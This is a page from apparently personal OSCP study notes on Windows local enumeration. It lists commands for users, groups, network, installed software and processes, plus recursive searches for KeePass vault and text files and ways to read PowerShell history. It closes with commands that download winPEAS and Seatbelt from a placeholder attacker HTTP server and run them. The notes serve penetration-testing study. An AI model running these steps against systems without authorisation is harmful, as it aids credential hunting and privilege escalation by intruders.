๐Ÿฒ
OSCP Notes
  • ๐ŸฒOSCP Notes
  • ๐ŸฒOSCP Methodology
  • ๐Ÿ’กMisc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • ๐Ÿง Mindmap
    • ๐ŸฅMimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  • Automated Enumeration
  • References
  1. Windows
  2. Enumeration

Local Enumeration

Username and hostname.

whoami
hostname

Group memberships of the current user.

whoami /groups

Existing users and groups.

Get-LocalUser
Get-LocalUser <user_name>
Get-LocalGroup
Get-LocalGroupMember <group_name>
net user
net user <user_name>
net localgroup 
net localgroup <group_name>

Operating system, version and architecture.

systeminfo

Network information.

ipconfig /all
route print
netstat -ano

Installed applications.

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Running processes.

Get-Process
Get-Process <Proccess> | select Path

Search for files.

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.bin *.txt -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.txt -File -Force -Recurse -ErrorAction SilentlyContinue

PowerShell history.

Get-History # Get History Commands

(Get-PSReadlineOption).HistorySavePath # Get History File Path

PowerShell history event logs.

Get-WinEvent Microsoft-Windows-PowerShell/Operational | Where-Object Id -eq 4104 | ForEach-Object { $_.Message } | findstr "dave*"

Automated Enumeration

Download and execute winPEAS and Seatbelt.

iwr -uri http://<attacker_http_server>/winPEASx64.exe -Outfile winPEAS.exe
iwr -uri http://<attacker_http_server>/Seatbelt.exe -Outfile Seatbelt.exe
.\Seatbelt.exe -group=all

References

PreviousExternal EnumerationNextActive Directory

Last updated 7 months ago

PEASS-ng/winPEAS at master ยท peass-ng/PEASS-ngGitHub
winPEAS
GitHub - GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.GitHub
Seatbelt
Logo
Logo